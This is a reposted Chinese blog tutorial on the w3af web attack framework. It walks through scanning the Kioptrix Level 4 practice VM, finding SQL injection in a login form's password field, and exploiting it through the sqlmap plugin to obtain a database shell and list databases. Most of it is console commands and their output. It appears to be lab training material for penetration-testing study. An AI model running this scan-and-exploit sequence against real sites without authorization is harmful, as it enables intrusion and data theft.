zoukankan      html  css  js  c++  java
  • w3af简单使用教程 —— TODO,https站点如何做扫描

    w3af简单使用教程
     

    line 2012-08-25 10:41:36 1751602

    6

    w3af是一个Web应用程序攻击和检查框架.该项目已超过130个插件,其中包括检查网站爬虫,SQL注入(SQL Injection),跨站(XSS),本地文件包含(LFI),远程文件包含(RFI)等.该项目的目标是要建立一个框架,以寻找和开发Web应用安全漏洞,所以很容易使用和扩展.

    0x00 概述

    在BackTrack5R3下使用w3af测试Kioptrix Level 4的SQL注入漏洞.

    0x01 简介

    w3af是一个Web应用程序攻击和检查框架.该项目已超过130个插件,其中包括检查网站爬虫,SQL注入(SQL Injection),跨站(XSS),本地文件包含(LFI),远程文件包含(RFI)等.该项目的目标是要建立一个框架,以寻找和开发Web应用安全漏洞,所以很容易使用和扩展.

    0x02 安装

    root@bt:~# apt-get install w3af

    0x03 启动


    root@bt:~# cd /pentest/web/w3af/
    root@bt:/pentest/web/w3af# ./w3af_console


    0x04 漏洞扫描配置


    w3af>>> plugins
    //进入插件模块
    w3af/plugins>>> list discovery 
    //列出所有用于发现的插件
    w3af/plugins>>> discovery findBackdoor phpinfo webSpider 
    //启用findBackdoor phpinfo webSpider这三个插件
    w3af/plugins>>> list audit 
    //列出所有用于漏洞的插件
    w3af/plugins>>> audit blindSqli fileUpload osCommanding sqli xss 
    //启用blindSqli fileUpload osCommanding sqli xss这五个插件
    w3af/plugins>>> back
    //返回主模块
    w3af>>> target
    //进入配置目标的模块
    w3af/config:target>>> set target http://192.168.244.132/
    //把目标设置为http://192.168.244.132/
    w3af/config:target>>> back
    //返回主模块


    0x05 漏洞扫描


    w3af>>> start



    ---
    New URL found by phpinfo plugin: http://192.168.244.132/
    New URL found by phpinfo plugin: http://192.168.244.132/checklogin.php
    New URL found by phpinfo plugin: http://192.168.244.132/index.php
    New URL found by webSpider plugin: http://192.168.244.132/
    New URL found by webSpider plugin: http://192.168.244.132/checklogin.php
    New URL found by webSpider plugin: http://192.168.244.132/index.php
    Found 3 URLs and 8 different points of injection.
    The list of URLs is:
    - http://192.168.244.132/index.php
    - http://192.168.244.132/checklogin.php
    - http://192.168.244.132/
    The list of fuzzable requests is:
    - http://192.168.244.132/ | Method: GET
    - http://192.168.244.132/ | Method: GET | Parameters: (mode="phpinfo")
    - http://192.168.244.132/ | Method: GET | Parameters: (view="phpinfo")
    - http://192.168.244.132/checklogin.php | Method: GET
    - http://192.168.244.132/checklogin.php | Method: POST | Parameters: (myusername="", mypassword="")
    - http://192.168.244.132/index.php | Method: GET
    - http://192.168.244.132/index.php | Method: GET | Parameters: (mode="phpinfo")
    - http://192.168.244.132/index.php | Method: GET | Parameters: (view="phpinfo")
    Blind SQL injection was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The injectable parameter is: "mypassword". This vulnerability was found in the requests with ids 309 to 310.
    A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "supplied argument is not a valid MySQL". The error was found on response with id 989.
    A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "mysql_". The error was found on response with id 989.
    SQL injection in a MySQL database was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The sent post-data was: "myusername=John&Submit=Login&mypassword=d'z"0". The modified parameter was "mypassword". This vulnerability was found in the request with id 989.
    Scan finished in 19 seconds.
    ---
    //开始扫描


    0x06 漏洞利用配置


    w3af>>> exploit 
    //进入漏洞利用模块
    w3af/exploit>>> list exploit
    //列出所有用于漏洞利用的插件
    w3af/exploit>>> exploit sqlmap 
    //使用sqlmap进行SQL注入漏洞的测试



    ---
    Trying to exploit using vulnerability with id: [1010, 1011]. Please wait...
    Vulnerability successfully exploited. This is a list of available shells and proxies:
    - [0] <sql object ( dbms: "MySQL >= 5.0.0" | ruser: "root@localhost" )>
    Please use the interact command to interact with the shell objects.
    ---
    //测试存在SQL注入漏洞
    //这里要记住shell objects(这里是0),等一下要用到
    0x07 漏洞利用
    w3af/exploit>>> interact 0
    //interact + shell object就可以利用了
    
    ---
    Execute "exit" to get out of the remote shell. Commands typed in this menu will be run through the sqlmap shell
    w3af/exploit/sqlmap-0>>> 
    ---
    //sqlmap的一个交互式模块
    
    w3af/exploit/sqlmap-0>>> dbs   
    
    ---
    Available databases:  [3]:
    [*] information_schema
    [*] members
    [*] mysql
    ---
    //成功获得数据库信息
  • 相关阅读:
    BZOJ 2212/BZOJ 3702
    BZOJ 4761 Cow Navigation
    BZOJ 3209 花神的数论题
    BZOJ 4760 Hoof, Paper, Scissors
    BZOJ 3620 似乎在梦中见过的样子
    BZOJ 3940 Censoring
    BZOJ 3942 Censoring
    BZOJ 3571 画框
    BZOJ 1937 最小生成树
    BZOJ 1058 报表统计
  • 原文地址:https://www.cnblogs.com/bonelee/p/13624456.html
Copyright © 2011-2022 走看看